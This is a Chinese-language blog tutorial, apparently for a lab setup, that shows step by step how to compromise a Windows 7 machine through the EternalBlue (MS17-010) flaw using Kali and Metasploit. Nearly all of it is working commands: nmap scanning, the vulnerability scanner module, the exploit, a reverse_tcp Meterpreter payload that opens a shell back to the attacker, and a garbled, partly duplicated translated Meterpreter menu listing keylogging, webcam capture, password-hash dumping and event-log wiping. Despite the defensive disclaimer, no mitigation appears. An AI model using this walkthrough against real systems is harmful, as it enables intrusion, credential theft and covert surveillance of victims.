warning

本文目的并不是教会学者入侵win7主机,

而是加强防范

kali入侵win7

步骤一:实验环境的搭建

攻击机:kali(2022.3版本)
靶机:win7 专业版 sp1 x64位

安装好上面两个环境后分别都打开

kali环境:

Windows7环境:

让我们查找win7IP地址

打开终端输入

nmap -sP 输入kali的IP地址/24

发现有4个IP地址

使用nmap扫描这几个ip

nmap -O 输入扫描好的IP地址

可以看到445端口是打开状态而且系统是Windows

打开终端输入

msfconsole

出现这样界面就可以了

每次打开msf工具的图案都不相同,不需要担心

搜寻相关的攻击辅助模块和攻击模块

然后输入

search ms17_010

exploit/windows/smb/ms17_010_eternalblue 这个是攻击模块
auxiliary/scanner/smb/smb_ms17_010 这个是扫描模块

知道模块了,如何使用呢?

输入

use auxiliary/scanner/smb/smb_ms17_010 

模块前面加上use

然后会变成这样

扫描检测漏洞辅助模块加载完成了

检测需要传入什么参数?

突然有声音钻进我的耳朵里

用rhost

对啊,这参数比较简单,输入攻击目标IP即可

set rhosts 192.168.0.122

忘记加s结果报错

接着执行这个已经设置好参数的探测模块

输入

run

翻译为:192.168.0.122:445 - 主机可能容易受到 MS17-010 的攻击!- Windows 7 专业版 7601 服务包 1 x64(64 位)
[*] 192.168.0.122:445 - 已扫描 1 个主机中的 1 个(100% 完成)
[*]辅助模块执行完成

我们的攻击已成功一大半,下面让我们进行对目标主机的攻击

输入

run exploit/windows/smb/ms17_010_eternalblue

然后出现以下界面

我们需要设置的参数为payload(攻击载荷),rhost(目标IP)

输入

set payload windows/x64/meterpreter/reverse_tcp

然后得到以下界面

然后在输入

set rhosts 192.168.0.122

得到

注意这是最后一步,也是最关键一步输入

exploit

然后成为这样

如果网络不好的话会在这里卡一会,或者目标系统有杀软的话,就会卡在这里

最后看见win了吗,恭喜你没成功拿到权限

拿到权限以后输入

help

然后得到一下信息

翻译:

? “帮助”菜单background当前会话的背景bg背景别名bgkill终止后台meterpretr脚本bglist列出正在运行的后台脚本bgrun将meterpretr脚本作为后台执行线通道显示信息或控制活动通道lsclose关闭频道detach分离meterpreter会话(对于http秒)disable_unicode_encoding禁用unicode字符串的编码enable_unicode编码启用unicode字符串编码exit终止meterpreter会话get_timeouts获取当前会话超时值guid获取会话guid帮助帮助菜单info显示有关Post模块的信息irb在当前浏览器上打开一个交互式Ruby shell一场load加载一个或多个meterpreter扩展machine_id获取连接到一场migrate将服务器迁移到另一个进程pivot管理pivot侦听器pry打开当前会话上的pry调试器quit终止meterpreter会话read从通道读取数据resource运行存储在文件中的命令run执行meterpreter脚本或Post模块安全(重新)协商服务器上的TLV数据包加密会话sessions快速切换到另一个会话set_timeouts设置当前会话超时值睡眠力计安静下来,然后重新建立ish会话ssl_verify修改ssl证书验证设置英国transport管理传输机制将不推荐的别名用于“load”uuid获取当前会话的uuidwrite将数据写入通道Stdapi:文件系统命令============================命令说明------- -----------cat将文件的内容读到屏幕上cd更改目录checksum检索文件的校验和cp将源复制到目标del删除指定的文件dir列表文件(ls的别名)下载下载文件或目录编辑编辑文件getlwd打印本地工作目录getwd打印工作目录lcat将本地文件的内容读取到屏幕lcd更改本地工作目录lls列出本地文件lpwd打印本地工作目录ls列表文件mkdir生成目录mv将源移动到目标pwd打印工作目录rm删除指定的文件rmdir删除目录搜索搜索文件show_mount列出所有装载点/逻辑驱动器上传上传文件或目录Stdapi:网络命令===========================命令说明------- -----------arp显示主机arp缓存getproxy显示当前代理配置ifconfig显示接口ipconfig显示接口netstat显示网络连接portfwd将本地端口转发到远程服务resolve解析目标上的一组主机名route查看和修改路由表Stdapi:系统命令=======================命令说明------- -----------clearev清除事件日志drop_token放弃任何活动的模拟令牌。execute执行命令getenv获取一个或多个环境变量值getpid获取当前进程标识符getprivs尝试启用当前过程getsid获取服务器作为运行的用户的SIDgetuid获取服务器运行的用户kill终止进程localtime显示目标系统本地日期和时间pgrep按名称筛选进程pkill按名称终止进程ps(秒)clearev清除事件日志drop_token放弃任何活动的模拟令牌。execute执行命令getenv获取一个或多个环境变量值getpid获取当前进程标识符getprivs尝试启用当前过程getsid获取服务器作为运行的用户的SIDgetuid获取服务器运行的用户kill终止进程localtime显示目标系统本地日期和时间pgrep按名称筛选进程pkill按名称终止进程ps列出正在运行的进程重新启动重新启动远程计算机reg修改并与远程注册表交互rev2self在远程计算机上调用RevertToSelf()shell放入系统命令shellshutdown关闭远程计算机steep_token尝试从目标窃取模拟令牌过程suspend挂起或恢复进程列表sysinfo获取有关远程系统的信息,例如操作系统Stdapi:用户界面命令===============================命令说明------- -----------enumdesktops列出所有可访问的桌面和窗口站getdesktop获取当前meterpreter桌面idletime返回远程用户已使用的秒数多尔keyboard_send发送击键keyevent发送关键事件keyscan_dump转储击键缓冲区keyscan_start开始捕获击键keyscan_stop停止捕获击键mouse发送鼠标事件屏幕共享实时观看远程用户桌面屏幕截图抓取交互式桌面的屏幕截图setdesktop更改仪表当前桌面uictl控制一些用户界面组件Stdapi:网络摄像头命令=======================命令说明------- -----------record_mic从默认麦克风录制音频X秒webcam_chat开始视频聊天webcam_list列出网络摄像头webcam_snap从指定的网络摄像头获取快照webcam_stream从指定的网络摄像机播放视频流Stdapi:音频输出命令=============================命令说明------- -----------play在目标系统上播放波形音频文件(.wav)Priv:提升命令======================命令说明------- -----------getsystem尝试将您的权限提升到本地系统的权限.Priv:密码数据库命令================================命令说明------- -----------hashdump转储SAM数据库的内容Priv:Timestomp命令========================命令说明------- -----------timestomp操作文件MACE属性

拿系统命令是

shell

我们发现出现了乱码输入这个指令解决乱码问题

chcp 65001

我电脑太卡了,剩下的不弄了

kali利用MSF对永恒之蓝漏洞入侵windows7相关推荐

  1. 【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)

    目录 1 MSF框架 1.1 MSF简介 1.2 MSF五大模块类型 1.3 渗透攻击步骤 1.4 小结 2 实验简介 2.1 永恒之蓝简介 2.2 实验环境 2.3 实验目的 3 实验前准备 3.1 ...

  2. 永恒之蓝漏洞(windows7)

    扫描端口 ┌──(root

  3. 永恒之蓝漏洞(开放445端口,关闭防火墙)

    小白学了一点简单的永恒之蓝,做了点笔记,感觉挺详细,希望能帮助到小伙伴们,大佬勿喷哦,有不足的地方希望多多指教 实验目的 本次实验主要是利用永恒之蓝漏洞对windows7进行控制利用,掌握Metapl ...

  4. kali 利用msf通过win7永恒之蓝漏洞获取权限

    kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...

  5. MSF之ms17-010永恒之蓝漏洞利用

    MSF之ms17-010永恒之蓝漏洞利用 准备 扫描漏洞 漏洞攻击 准备 实验准备环境: 被攻击机:虚拟机win7x64位系统,其IP为:10.101.2.11(关闭了防火墙) 攻击机:虚拟机kali ...

  6. kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决

    两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标 ...

  7. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  8. MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口) 2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:19 ...

  9. 【网络安全】MS17-010“永恒之蓝”漏洞的利用

    导语 最近学期末进行网络安全实训,老师要求每个小组选择一个方向进行研究,本篇将讲述"永恒之蓝"漏洞的简单利用. 一.实验原理 Eternalblue通过TCP端口445和139来利 ...

最新文章

  1. Python持续点火,跟进还是观望?
  2. 重装失败、PE不能使用、重装很卡 个人电脑故障处理记录
  3. [转]如何解决:Android中 Error generating final archive: Debug Certificate expired on 10/09/18 16:30 的错误...
  4. 文件内容查找java,java库从文件内容中查找mime类型
  5. arduino定时器控制舵机_Arduino学习经验(一)之解决舵机库和pwm输出冲突
  6. 机器学习导论(张志华):渐近性质
  7. java线程池(ThreadPool)
  8. sql server配置连接oracle数据库,MS SQL Server连接Oracle
  9. PROTEUS元件库元件称呼 .
  10. sqlilte 判断当天日期_Java8 必会的日期处理的实践,必须收藏!
  11. MFC工作笔记0002---MFC HelloWorld程序
  12. 自学python能干些什么副业-揭秘!女程序员为啥更赚钱?这4个大招,用Python做副业躺赚...
  13. SQL Server 全文搜索
  14. 【单片机原理及应用】第一篇——单片机概述
  15. vs程序 C++语言的给textbox加限制
  16. Excel表格撤销工作表保护
  17. 购买计算机相关配件的会计分录,购买电脑配件自己组装电脑怎么写会计分录
  18. win10键盘全变成快捷键_电脑键盘灵敏度设置方法
  19. 关于动态创建option 【copy from 姬光】
  20. JSR规范系列(1)——Java版本、JSR规范和JCP社区流程概述

热门文章

  1. WIN7睡眠蓝屏0X0000009F
  2. 【打开硬盘文件夹报回收站损坏是否清空】
  3. 【论文译文】Few-Shot Unsupervised Image-to-Image Translation(FUNIT)
  4. 【Problems】:JSON parse error: Invalid UTF-8 start byte 0xbd;
  5. python自动抓取网管软件的数据_python实现scrapy爬虫每天定时抓取数据的示例代码...
  6. android栅格地图,Android中在Bitmap上画网格线
  7. LeetCode 365. 水壶问题
  8. 洛谷 P2657 [SCOI2009] windy数 数位DP
  9. 交易猫 转转 闲鱼后台源码
  10. python求合数的所有因子,0是素数吗(python求一个数的因子)